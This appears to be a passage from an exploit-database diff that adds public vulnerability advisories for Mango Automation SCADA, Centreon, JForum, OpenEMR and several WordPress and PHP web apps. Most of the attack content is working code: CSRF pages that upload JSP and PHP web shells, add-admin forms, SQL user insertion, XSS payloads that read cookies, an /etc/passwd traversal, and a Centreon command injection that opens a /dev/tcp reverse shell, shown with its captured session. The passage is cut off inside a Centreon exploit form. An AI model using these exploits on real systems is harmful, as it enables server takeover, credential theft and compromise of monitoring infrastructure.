electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

10
platforms/jsp/webapps/38334.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/58164/info
JForum is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
JForum 2.1.9 is vulnerable; other versions may also be affected.
GET/jforum/jforum.page?module=posts&start=0&forum_id=1&quick=1&disable_html=1&action=insertSave4a9d0%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e5d668e3a93160a27e&topic_id=2 HTTP/1.1

361
platforms/jsp/webapps/38338.txt Executable file
View file

@ -0,0 +1,361 @@
Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution
Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)
Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you
to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.
Desc: Mango suffers from an authenticated arbitrary JSP code execution. The vulnerability is caused due
to the improper verification of uploaded image files in 'graphicalViewsBackgroundUpload' script via the
'backgroundImage' POST parameter which allows of arbitrary files being uploaded in '/modules/graphicalViews/web/graphicalViewUploads/'.
This can be exploited to execute arbitrary JSP code by uploading a malicious JSP script file that will be
stored as a sequence number depending on how many files were uploaded (1.jsp or 2.jsp or 3.jsp .. n.jsp).
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Jetty(9.2.2.v20140723)
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5262
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5262.php
20.08.2015
--
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:8080/graphicalViewsBackgroundUpload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryb8cxmjBwpzDcHUVI");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryb8cxmjBwpzDcHUVI\r\n" +
"Content-Disposition: form-data; name=\"backgroundImage\"; filename=\"cmd.jsp\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c%@ page import=\"java.util.*,java.io.*,java.net.*\"%\x3e\r\n" +
"\x3cHTML\x3e\x3cBODY\x3e\r\n" +
"\x3cFORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\"\x3e\r\n" +
"\x3cINPUT TYPE=\"text\" NAME=\"cmd\"\x3e\r\n" +
"\x3cINPUT TYPE=\"submit\" VALUE=\"Send\"\x3e\r\n" +
"\x3c/FORM\x3e\r\n" +
"\x3cpre\x3e\r\n" +
"\x3c%\r\n" +
"if (request.getParameter(\"cmd\") != null) {\r\n" +
" out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\\n\x3cBR\x3e\");\r\n" +
" Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"cmd\"));\r\n" +
" OutputStream os = p.getOutputStream();\r\n" +
" InputStream in = p.getInputStream();\r\n" +
" DataInputStream dis = new DataInputStream(in);\r\n" +
" String disr = dis.readLine();\r\n" +
" while ( disr != null ) {\r\n" +
" out.println(disr); disr = dis.readLine(); }\r\n" +
" }\r\n" +
"%\x3e\r\n" +
"\x3c/pre\x3e\r\n" +
"\x3c/BODY\x3e\x3c/HTML\x3e\r\n" +
"------WebKitFormBoundaryb8cxmjBwpzDcHUVI--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Webshell: http://localhost:8080/modules/graphicalViews/web/graphicalViewUploads/17.jsp
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary Command Execution Exploit
Advisory ID: ZSL-2015-5261
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5261.php
20.08.2015
--
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/EventHandlersDwr.testProcessCommand.dwr" method="POST">
<input type="hidden" name="callCount" value="1" />
<input type="hidden" name="page" value="&#47;event&#95;handlers&#46;shtm" />
<input type="hidden" name="httpSessionId" value="&#13;" />
<input type="hidden" name="scriptSessionId" value="26D579040C1C11D2E21D1E5F321094E5866" />
<input type="hidden" name="c0&#45;scriptName" value="EventHandlersDwr" />
<input type="hidden" name="c0&#45;methodName" value="testProcessCommand" />
<input type="hidden" name="c0&#45;id" value="0" />
<input type="hidden" name="c0&#45;param0" value="string&#58;C&#58;&#92;&#92;windows&#92;&#92;system32&#92;&#92;calc&#46;exe" />
<input type="hidden" name="c0&#45;param1" value="string&#58;15" />
<input type="hidden" name="batchId" value="24" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability
Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php
20.08.2015
--
One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):
- http://localhost:8080/status/
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:
- http://localhost/status/mango.json?time=$
- http://localhost/status/
Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n LONG_POLL_DATA_TIMEOUT=1440143583487\r\n LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n constants.Permissions.DataPointAccessTypes.READ=1\r\n org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n constants.DataTypes.BINARY=1\r\n constants.UserComment.TYPE_EVENT=1\r\n constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n
Also you can list all of the Classes known to DWR:
- http://localhost:8080/dwr/index.html
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary SQL Query Execution
Advisory ID: ZSL-2015-5259
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5259.php
20.08.2015
--
SQL query in version 2.5.2 (pass 123123) with hash injection:
-------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','Y','N',1440075860103,'','0','N','','Y');
1 records(s) updated.
SQL query in version 2.6.0 beta build 327 (pass 123123) with hash injection:
----------------------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','N',1440075860103,'','0','N','','Y','superadmin');
1 records(s) updated.
USERS table:
ID USERNAME PASSWORD EMAIL PHONE DISABLED LASTLOGIN HOMEURL RECEIVEALARMEMAILS RECEIVEOWNAUDITEVENTS TIMEZONE MUTED PERMISSIONS
1.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&query=Submit+query
2.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&tables=Get+table+list
3.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 246
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=INSERT+INTO+USERS+VALUES%289%2C%27gjoko3%27%2C%27YB8YiWZ%2B%2BuuzO4wSVyg12j8Cf3g%3D%27%2C%27gjoko%40z.sl%27%2C%27333222111%27%2C%27Y%27%2C%27N%27%2C1440075860103%2C%27%27%2C%270%27%2C%27N%27%2C%27%27%2C%27Y%27%29%3B&update=Submit+update
#################################################################
Mango Automation 2.6.0 CSRF Add Admin Exploit
Advisory ID: ZSL-2015-5258
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5258.php
20.08.2015
--
2.5.2:
<!-- user hacker, pass 123123 -->
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/UsersDwr.saveUserAdmin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1&#10;page&#61;&#47;users&#46;shtm&#10;httpSessionId&#61;&#10;scriptSessionId&#61;8BD64066486071219EB8691611D48F14109&#10;c0&#45;scriptName&#61;UsersDwr&#10;c0&#45;methodName&#61;saveUserAdmin&#10;c0&#45;id&#61;0&#10;c0&#45;param0&#61;number&#58;&#45;1&#10;c0&#45;param1&#61;string&#58;hacker&#10;c0&#45;param2&#61;string&#58;123123&#10;c0&#45;param3&#61;string&#58;hacker&#37;40hacker&#46;hack&#10;c0&#45;param4&#61;string&#58;111222333&#10;c0&#45;param5&#61;boolean&#58;true&#10;c0&#45;param6&#61;boolean&#58;false&#10;c0&#45;param7&#61;string&#58;0&#10;c0&#45;param8&#61;boolean&#58;false&#10;c0&#45;param9&#61;string&#58;&#10;c0&#45;param10&#61;Array&#58;&#91;&#93;&#10;c0&#45;param11&#61;Array&#58;&#91;&#93;&#10;batchId&#61;5&#10;" />
<input type="submit" value="Submit request 1" />
</form>
</body>
</html>
2.6.0 beta (build 327):
<!-- user hacker3, pass admin (in sha1(base64) hash value) -->
<html>
<body>
<form action="http://localhost:8080/rest/v1/users.json" method="POST" enctype="text/plain">
<input type="hidden" name="&#123;&quot;username&quot;&#58;&quot;hacker3&quot;&#44;&quot;password&quot;&#58;&quot;0DPiKuNIrrVmD8IUCuw1hQxNqZc" value="&quot;&#44;&quot;email&quot;&#58;&quot;hacker&#64;zeroscience&#46;mk&quot;&#44;&quot;phone&quot;&#58;&quot;111222333&quot;&#44;&quot;muted&quot;&#58;true&#44;&quot;disabled&quot;&#58;false&#44;&quot;homeUrl&quot;&#58;&quot;http&#58;&#47;&#47;www&#46;zeroscience&#46;mk&quot;&#44;&quot;receiveAlarmEmails&quot;&#58;&quot;NONE&quot;&#44;&quot;receiveOwnAuditEvents&quot;&#58;false&#44;&quot;timezone&quot;&#58;&quot;&quot;&#44;&quot;permissions&quot;&#58;&quot;user&#44;superadmin&quot;&#125;" />
<input type="submit" value="Submit request 2" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability
Advisory ID: ZSL-2015-5257
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5257.php
20.08.2015
--
<html>
<head>
<title>Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability</title>
</head>
<body>
<form name="login" method="post" action="http://localhost:8080/login.htm">
<input type="hidden" name="username" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="password" value="blah" />
</form>
<script type="text/javascript">
document.login.submit();
</script>
</body>
</html>
#################################################################
Mango Automation 2.6.0 User Enumeration Weakness
Advisory ID: ZSL-2015-5256
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5256.php
20.08.2015
--
Request for non-existent username:
----------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm;jsessionid=6zpfpnxljyzf13l3zrpx9e0xd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=noob&password=123123
Response:
- <td class="formError">User id not found</td>
Request for existent username:
------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=admin&password=123123
Response:
- <td colspan="3" class="formError">Invalid login<br/>

9
platforms/php/webapps/38324.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58072/info
The Pretty Link plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Pretty Link 1.6.3 are vulnerable.
http://www.example.com/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()

9
platforms/php/webapps/38326.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58078/info
Zenphoto is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Zenphoto 1.4.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection]

13
platforms/php/webapps/38327.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/58081/info
PHPmyGallery is prone to multiple cross-site scripting vulnerabilities and a local file-disclosure vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks
PHPmyGallery 1.51.010 and prior versions are vulnerable.
http://www.www.example.com/_conf/?action=statistics&filename=2011.10"><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
http://www.www.example.com/_conf/?action=delsettings&group="><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
http://www.example.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions

9
platforms/php/webapps/38328.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58085/info
OpenEMR is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
OpenEMR 4.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/openemr/[DIR]/[SCRIPT]?site="><script>alert(1);</script>

19
platforms/php/webapps/38329.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/58116/info
ZeroClipboard is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ZeroClipboard versions prior to 1.1.7 are vulnerable.
http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

9
platforms/php/webapps/38331.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58135/info
The Smart Flv plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link
https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29

9
platforms/php/webapps/38332.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58151/info
Batavi is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Batavi 1.2.2 is vulnerable; other versions may also be affected.
<root>/admin/index.php?file_manager&file_manager&"><script>alert(123)</script></a><a href="

18
platforms/php/webapps/38333.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/58160/info
phpMyRecipes is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks may also be possible.
phpMyRecipes 1.2.2 is vulnerable; other versions may also be affected.
POST /recipes/addrecipe.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
r_name="><script>alert(0)</script>&r_category=13&r_servings=1&r_difficulty=1&i_qty=&i_unit=4&i_item=0&i_item_text=&r_instructions="><script>alert(0)</script>

13
platforms/php/webapps/38335.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/58209/info
Geeklog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Geeklog 1.8.2 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/submit.php?type=calendar" method="post">
<input type="hidden" name="mode" value="Submit">
<input type="hidden" name="calendar_type" value=&#039;"><script>alert(document.cookie);</script>&#039;>
<input type="submit" id="btn">
</form>

305
platforms/php/webapps/38339.txt Executable file
View file

@ -0,0 +1,305 @@
Centreon 2.6.1 Command Injection Vulnerability
Vendor: Centreon
Product web page: https://www.centreon.com
Affected version: 2.6.1 (CES 3.2)
Summary: Centreon is the choice of some of the world's largest
companies and mission-critical organizations for real-time IT
performance monitoring and diagnostics management.
Desc: The POST parameter 'persistant' which serves for making
a new service run in the background is not properly sanitised
before being used to execute commands. This can be exploited
to inject and execute arbitrary shell commands as well as using
cross-site request forgery attacks.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5265
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5265.php
10.08.2015
--
<<<<<<
root@zslab:~# curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520' \
--data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as' \
'http://localhost.localdomain/centreon/main.php?p=20218'
>>>>>>
root@zslab:~# nc -4 -l -n 6161 -vv -D
Connection from 127.0.0.1 port 6161 [tcp/*] accepted
bash: no job control in this shell
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios)
bash-4.1$ uname -a;cat /etc/issue
uname -a;cat /etc/issue
Linux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Centreon Enterprise Server
Kernel \r on an \m
bash-4.1$ pwd
pwd
/usr/share/centreon/www
bash-4.1$ exit
exit
exit
root@zslab:~#
#################################################################
Centreon 2.6.1 Stored Cross-Site Scripting Vulnerability
Desc: Centreon suffers from a stored XSS vulnerability. Input
passed thru the POST parameter 'img_comment' is not sanitized
allowing the attacker to execute HTML code into user's browser
session on the affected site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5266
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5266.php
10.08.2015
--
POST /centreon/main.php?p=50102 HTTP/1.1
Host: localhost.localdomain
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost.localdomain/centreon/main.php?p=50102&o=a
Cookie: PHPSESSID=qg580onenijim611sca8or3o32
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------951909060822176775828135993
Content-Length: 1195
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="directories"
upload
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="list_dir"
0
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="filename"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?
phpinfo();
?>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_comment"
"><script>alert(1);</script>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="action[action]"
1
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="submitA"
Save
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_id"
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="o"
a
-----------------------------951909060822176775828135993--
#################################################################
Centreon 2.6.1 Unrestricted File Upload Vulnerability
Desc: The vulnerability is caused due to the improper verification
of uploaded files via the 'filename' POST parameter. This can be
exploited to execute arbitrary PHP code by uploading a malicious
PHP script file that will be stored in the '/img/media/' directory.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5264
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5264.php
10.08.2015
--
<html>
<!-- Specified dir is 1337 and filename is shelly.php -->
<!-- Ex: http://localhost.localdomain/centreon/img/media/1337/shelly.php?c=id -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost.localdomain/centreon/main.php?p=50102", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------951909060822176775828135993");
xhr.withCredentials = true;
var body = "-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"directories\"\r\n" +
"\r\n" +
"1337\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"list_dir\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"filename\"; filename=\"shelly.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"echo \"\x3cpre\x3e\";system($_GET[\'c\']);echo \"\x3c\/pre\x3e\";\r\n" +
"?\x3e\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_comment\"\r\n" +
"\r\n" +
"peened\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"action[action]\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"submitA\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"2097152\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_id\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"o\"\r\n" +
"\r\n" +
"a\r\n" +
"-----------------------------951909060822176775828135993--";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
#################################################################
Centreon 2.6.1 CSRF Add Admin Exploit
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5263
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
10.08.2015
--
<html>
<body>
<form action="'http://localhost.localdomain/centreon/main.php?p=60301" method="POST">
